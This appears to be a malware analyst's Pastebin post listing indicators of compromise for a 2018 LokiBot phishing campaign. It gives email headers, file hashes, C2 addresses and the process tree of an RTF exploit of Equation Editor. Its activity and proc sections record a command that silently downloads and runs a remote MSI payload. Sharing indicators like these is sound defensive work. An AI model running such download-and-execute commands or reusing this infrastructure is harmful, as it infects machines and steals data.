Advertisement
VRad

#lokibot_151118

Nov 15th, 2018
849
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.80 KB | None | 0 0
  1. #IOC #OptiData #VR #LokiBot #11882 #MSI
  2.  
  3. https://pastebin.com/cqZg7kwr
  4.  
  5. previous_contacts:
  6. --------------
  7. 16/10/18 - https://pastebin.com/LPqjHUkQ
  8. 08/10/18 - https://pastebin.com/cZxQGbyq
  9. 01/10/18 - https://pastebin.com/AVWK3XsB
  10.  
  11. FAQ:
  12. https://radetskiy.wordpress.com/2018/10/19/ioc_lokibot_161018/
  13.  
  14. attack_vector
  15. --------------
  16. email attach doc(RTF) > 11882 > EQNEDT32.EXE GET > msiexec.exe /i 34.244.180.39/oo.msi
  17.  
  18. email_headers
  19. --------------
  20. Received: from elayouty.com (unknown [84.16.232.203]) by mail1.victim.com with smtp
  21. Received: from [::1] (port=48392 helo=server.sauditunnels.com)
  22. by server.sauditunnels.com with esmtpa (Exim 4.91)
  23. (envelope-from <[email protected]>)
  24. Date: Thu, 15 Nov 2018 06:34:16 +0300
  25. From: PURCHASE <[email protected]>
  26. To: undisclosed-recipients:;
  27. Subject: PURCHASE ORDER 25437
  28. User-Agent: Roundcube Webmail/1.3.6
  29.  
  30. files
  31. --------------
  32. SHA-256 1a711629a0cc2ec3e9c14d9500ff7cab1114474c98eb0d9392e269f50aea8513
  33. File name DOC_ORDER25437.doc (!) RTF
  34. File size 265.34 KB
  35.  
  36. SHA-256 917ef82d209a7293244706bbd625c3d055d152d6eb37c30e99b214d1a085e051
  37. File name oo.msi
  38. File size 1.25 MB
  39.  
  40.  
  41. Denis O'Brien @Malwageddon:
  42. "If metadata doesn't lie, the RTF file was created back in Sep."
  43.  
  44. activity
  45. **************
  46.  
  47. cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180{.} 39/oo.msi /quiet
  48.  
  49. PL_GET: 34.244.180.39/oo.msi
  50.  
  51. C2: 188.225.27.43
  52. h11p://sahakyanshn{.} com/baba1010/five/fre.php
  53.  
  54. netwrk
  55. --------------
  56. GET /oo.msi HTTP/1.1
  57. Connection: Keep-Alive
  58. Accept: */*
  59. User-Agent: Windows Installer
  60. Host: 34.244.180.39
  61.  
  62. 188.225.27.43 sahakyanshn{.} com POST /baba1010/five/fre.php HTTP/1.0 Mozilla/4.08 (Charon; Inferno)
  63.  
  64. comp
  65. --------------
  66. msiexec.exe 440 TCP 34.244.180.39 80 SYN_SENT
  67. MSIF29F.tmp 3348 TCP 188.225.27.43 80 ESTABLISHED
  68. [System] 0 TCP 188.225.27.43 80 TIME_WAIT
  69.  
  70. proc
  71. --------------
  72. "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  73. C:\Windows\SysWOW64\cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180.39/oo.msi /quiet
  74. C:\Windows\SysWOW64\msiexec.exe /i http://34.244.180.39/oo.msi /quiet
  75. C:\Windows\system32\msiexec.exe /V
  76. "C:\Windows\Installer\MSIF29F.tmp"
  77.  
  78. persist
  79. --------------
  80. n/a
  81.  
  82. drop
  83. --------------
  84. C:\Windows\Installer\MSIF29F.tmp
  85. C:\Users\operator\AppData\Roaming\39B01F\FA74A3.exe
  86. C:\Users\operator\AppData\Roaming\39B01F\FA74A3.hdb
  87.  
  88. # # #
  89. doc (RTF) https://www.virustotal.com/#/file/1a711629a0cc2ec3e9c14d9500ff7cab1114474c98eb0d9392e269f50aea8513/details
  90. https://iris-h.services/#/pages/report/3dd0fe53b7f1ade6765df8da45b8b7c2ae6ed41b
  91. msi https://www.virustotal.com/#/file/917ef82d209a7293244706bbd625c3d055d152d6eb37c30e99b214d1a085e051/details
  92. https://analyze.intezer.com/#/analyses/3d6796ac-e098-4b61-aad7-3cc552dd2304
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement